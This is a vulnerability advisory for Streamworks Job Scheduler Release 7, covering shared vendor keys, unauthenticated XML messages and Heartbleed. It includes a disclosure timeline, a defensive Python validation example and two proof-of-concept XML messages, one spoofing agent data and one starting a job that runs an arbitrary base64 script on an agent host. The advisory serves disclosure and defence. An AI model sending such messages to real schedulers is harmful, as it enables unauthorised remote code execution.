Streamworks Job Scheduler Release 7 Authentication Weakness

Posted Jan 16, 2019
Authored by Simon Bieber

Streamworks Job Scheduler Release 7 has all agents using the same X.509 certificates and keys issued by the vendor for authentication. The processing server component does not check received messages properly for authenticity. Agents installed on servers do not check received messages properly for authenticity. Agents and processing servers are vulnerable to the TLS Heartbleed attack.

tags | exploit
advisories | CVE-2014-0160
SHA-256 | 8d3ab2a2e1407bcba852d7925fccb15e6610ced1db687ba89dc4e1333028ea6d

Affected Products
Streamworks Job Scheduler Release 7 (older/newer releases have not been tested)

References
Secuvera-SA-2016-01
https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for updates)
No CVE number could be assigned (vendor not listed under cve.mitre.org/data/board/archives/2016-01/msg00015.html)

Summary:
Arvato Systems Streamworks Job Scheduler is a software product for automation purposes. It helps "to plan, maintain, control and monitor all of your automatable IT processes" (source: vendor product homepage). It consists of different types of services: an application server daemon, and a processing server daemon that controls one or multiple agent daemons installed on the operating servers where the workload has to be done.

During a penetration test at a customer's site, three weaknesses concerning communication authentication were discovered:

1) All agents installed on server systems use the same X.509 certificates and private key, which were issued by the vendor for authentication.

2) The processing server component does not check received messages properly for authenticity.

3) Agents installed on servers do not check received messages properly for authenticity.

4) Agents and processing servers are vulnerable to the TLS Heartbleed attack (CVE-2014-0160, see https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160).

Effect:
1) If systems are compromised and the authentication material is stolen, all certificates have to be revoked and replaced. In addition, because every agent shares the same key material, this expands the effect of 3) to the entire environment, not just single systems.

2) An attacker with knowledge of the message syntax of the product and the authentication material is able to add, change or delete data within the Streamworks database.

3) An attacker with knowledge of the message syntax of the product and the authentication material is able to create new jobs or execute available jobs on servers with agents installed that are located within the same network. This can lead to a complete loss of integrity, confidentiality or availability of the respective system or of the data stored/processed on it.

4) An unauthenticated remote attacker is able to read content within system memory.

Vulnerable components and scripts:
Streamworks Job Scheduler Processing Server Release 7.1
Streamworks Job Scheduler Agent Release 7.1
older releases have not been tested

Examples:
In the following, a sample to exploit 2) and 3) is given. Replace the information within square brackets:

2) By sending the following XML message to a processing server it is possible, as a proof of concept, to change the system information of a legitimately configured client. The system OS info was slightly changed:

<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
  <ComHeader Version="1.0">
    <MandatorCode>0100</MandatorCode>
    <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
    <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
    <SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of legitimate client]" />
    <DestinationEndpoint Address="[FQDN of processing server]" Port="9600" SysId="[FQDN of processing server]" />
    <Sequence>0</Sequence>
  </ComHeader>
  <SystemInformation>
    <OsType>Windows</OsType>
    <OsInfo>Pentest Windows!</OsInfo>
    <OsLocale>de_DE.windows-1252</OsLocale>
  </SystemInformation>
  <KnownJobsList>
  </KnownJobsList>
  <FileTransferOptions Mode="ALL" BlockSize="0" />
  <Cli CliOptions="Enabled" />
</AgentNotifyStarted>


-------------


3) By sending an XML message of the following type to a system with an agent installed, a new job can be created and executed on it:

<ServerRequestStartJob>
  <ComHeader Version="0.1">
    <MandatorCode>0100</MandatorCode>
    <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
    <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
    <SourceEndpoint Address="[FQDN of processing server]" Port="9600" SysId="[FQDN of processing server]" />
    <DestinationEndpoint Address="[IP of server with agent installed]" Port="30000" SysId="[Hostname of server with agent installed]" />
    <Sequence>1</Sequence>
    <MandatorId>0100</MandatorId>
  </ComHeader>
  <JobStartInfo>
    <JobInfo ServerJobId="118291965_1" ExecutionNo="1" PlanDate="[YYYY]-[MM]-[DD]" StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
    <UserName>[Username under which the agent should run the script, e.g. LOCAL\System]</UserName>
    <Password>[Add password of the user if needed]</Password>
    <UseUserProfile>true</UseUserProfile>
    <MainScript>[base64-encoded script code, e.g. "cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl" to start a notepad.exe on a Windows host]</MainScript>
    <KeepJoblogDays>10</KeepJoblogDays>
  </JobStartInfo>
</ServerRequestStartJob>
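The missing check behind 2) and 3) is that neither endpoint ties the SysId claimed in the ComHeader to the identity the transport actually authenticated. The following added example (not code from the advisory or the product) shows such a check on the receiving side: it parses a constructed ServerRequestStartJob modelled on the advisory's sample, looks up the authenticated peer's role in a hypothetical directory, and rejects a message whose type the peer may not send or whose SourceEndpoint SysId does not match the authenticated identity. It assumes per-peer identities exist at all, which the shared vendor certificate described in 1) does not provide.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the advisory's ServerRequestStartJob message;
# element and attribute names come from the advisory, the values are made up.
SAMPLE_START_JOB = """<ServerRequestStartJob>
  <ComHeader Version="0.1">
    <MandatorCode>0100</MandatorCode>
    <SourceEndpoint Address="10.0.0.5" Port="9600" SysId="procsrv.example.test" />
    <DestinationEndpoint Address="10.0.0.20" Port="30000" SysId="agent01" />
    <Sequence>1</Sequence>
  </ComHeader>
  <JobStartInfo>
    <JobInfo ServerJobId="1_1" ExecutionNo="1" PlanDate="2016-05-12"
             StreamName="S" JobName="J" Run="1" />
    <UserName>LOCAL\\System</UserName>
    <MainScript>cmVtDQo=</MainScript>
  </JobStartInfo>
</ServerRequestStartJob>"""

# Which message types each peer role may send (an assumption for this example,
# not the product's real rules): only a processing server may start jobs.
ALLOWED_BY_ROLE = {
    "processing_server": {"ServerRequestStartJob"},
    "agent": {"AgentNotifyStarted"},
}

# Hypothetical directory mapping the identity proven by the transport
# (e.g. the CN of a per-host TLS client certificate) to its role.
PEER_ROLES = {"procsrv.example.test": "processing_server", "agent01": "agent"}


def check_message(xml_text, peer_identity):
    """Return (accepted, reason) for a received message.

    Rejects unknown peers, message types the peer's role may not send, and
    messages whose claimed SourceEndpoint SysId differs from the authenticated
    peer, so a spoofed header alone can no longer start a job.
    """
    root = ET.fromstring(xml_text)
    role = PEER_ROLES.get(peer_identity)
    if role is None:
        return False, "unknown peer identity"
    if root.tag not in ALLOWED_BY_ROLE[role]:
        return False, f"{role} may not send {root.tag}"
    src = root.find("./ComHeader/SourceEndpoint")
    if src is None or src.get("SysId") != peer_identity:
        return False, "SourceEndpoint SysId does not match authenticated peer"
    return True, "accepted"
```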

Solution:
Install Streamworks Release 9.3
(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available in German only)

Disclosure Timeline:
2016/05/12 vulnerabilities discovered
2016/05/30 vendor initially contacted
2016/06/13 sales representative replied
2016/06/14 technically responsible contact details received
2016/07/01 technical personnel contacted, appointment to discuss findings made
2016/07/11 submitted technical details to responsible personnel
2016/07/12 responsible product manager replied. Committed to extend the disclosure timeline due to comprehensible reasons. New disclosure timeline: end of September 2016
2016/09/08 product manager replied, suggested a meeting to discuss fixes
2016/09/27 meeting took place, half of the vulnerabilities were fixed. Timeline until disclosure extended again due to difficult changes. Disclosure timeline extended to end of April 2017
2017/04/20 Contacted vendor again to remind of the near end of the disclosure timeline.
2017/04/27 Reply and ongoing discussion about when the fix will be shipped.
2017/05/20 Vendor replied that due to customer experience fewer releases were made. The fix will be shipped in the second quarter of 2018. Extended disclosure timeline until the end of June 2018.
2018/04/03 Contacted vendor as reminder and to get a release ship date.
2018/04/09 Vendor replied saying that within release 9.3 (shipped in 2nd quarter 2018) the issues will be fixed. Final disclosure timeline: 2019/01/14, after a sufficient grace period for customers to install the fixed release
2019/01/14 public advisory disclosure


Credits
Simon Bieber, secuvera GmbH
sbieber@secuvera.de
https://www.secuvera.de

Disclaimer:
All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.
